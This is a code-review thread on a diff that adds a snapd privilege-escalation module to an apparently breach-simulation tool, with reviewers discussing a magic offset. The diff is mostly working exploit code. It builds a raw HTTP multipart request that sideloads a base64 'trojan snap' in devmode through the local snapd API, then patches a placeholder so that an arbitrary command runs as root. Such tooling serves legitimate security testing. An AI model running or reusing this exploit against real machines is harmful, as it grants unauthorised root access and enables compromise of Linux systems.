monkey/infection_monkey/pe/actions/snapd.py

```diff
@@ -0,0 +1,300 @@
+        # LOG.info(http_reply) debug output
+        return False
+
+    # We sleep to allow the API command to complete, otherwise the install
+    # may fail.
+    time.sleep(SLEEP)
+    return True
+
+
+def install_snap(client_sock, trojan_snap):
+    """Sideloads the trojan snap"""
+
+    # Decode the base64 from above back into bytes
+    blob = base64.b64decode(trojan_snap)
+
+    # Configure the multi-part form upload boundary here:
+    boundary = '------------------------f8c156143a1caf97'
+
+    # Construct the POST payload for the /v2/snap API, per the instructions
+    # here: https://github.com/snapcore/snapd/wiki/REST-API
+    # This follows the 'sideloading' process.
+    post_payload = '''
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="devmode"
+
+true
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="snap"; filename="snap.snap"
+Content-Type: application/octet-stream
+
+''' + blob.decode('latin-1') + '''
+--------------------------f8c156143a1caf97--'''
+
+    # Multi-part forum uploads are weird. First, we post the headers
+    # and wait for an HTTP 100 reply. THEN we can send the payload.
+    http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
+                 'Host: localhost\r\n'
+                 'Content-Type: multipart/form-data; boundary='
+                 + boundary + '\r\n'
+                 'Expect: 100-continue\r\n'
+                 'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')
+
+    # Send the headers to the snap API
+    LOG.info("[+] Installing the trojan snap (and sleeping 8 seconds)...")
+    client_sock.sendall(http_req1.encode("utf-8"))
+
+    # Receive the initial HTTP/1.1 100 Continue reply
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    if 'HTTP/1.1 100 Continue' not in http_reply:
+        LOG.info("[!] Error starting POST conversation, here is the reply:\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # Now we can send the payload
+    http_req2 = post_payload
+    client_sock.sendall(http_req2.encode("latin-1"))
+
+    # Receive the data and extract the JSON
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    # Exit on failure
+    if 'status-code":202' not in http_reply:
+        LOG.info("[!] Did not work, here is the API reply:\n\n")
+        LOG.info(http_reply) #debug output
+        return False
+
+    # Sleep to allow time for the snap to install correctly. Otherwise,
+    # The uninstall that follows will fail, leaving unnecessary traces
+    # on the machine.
+
+    time.sleep(8)
+    return True
+
+
+def run_command_as_root(command):
+    """
+    This function takes in the command and runs them as root
+    if the pe is successful
+    :param command: Command to be run as root
+    :return: True if the Pe is successful
+    """
+    global TROJAN_BASE_SNAP
+    command = command + APPEND_COMMENT
+    index = 108 + len(command)
```

Comment:
i think `108` can be exported and reused since this is some kind of magical number

Reply:
108 is where we have the place holder and that's why its special . I'll remember to add the documentation for this and trojan_base_snap :)

Reply:
I actually had a documentation about the place holder at the top, but forgot about this number, thanks for the heads up :D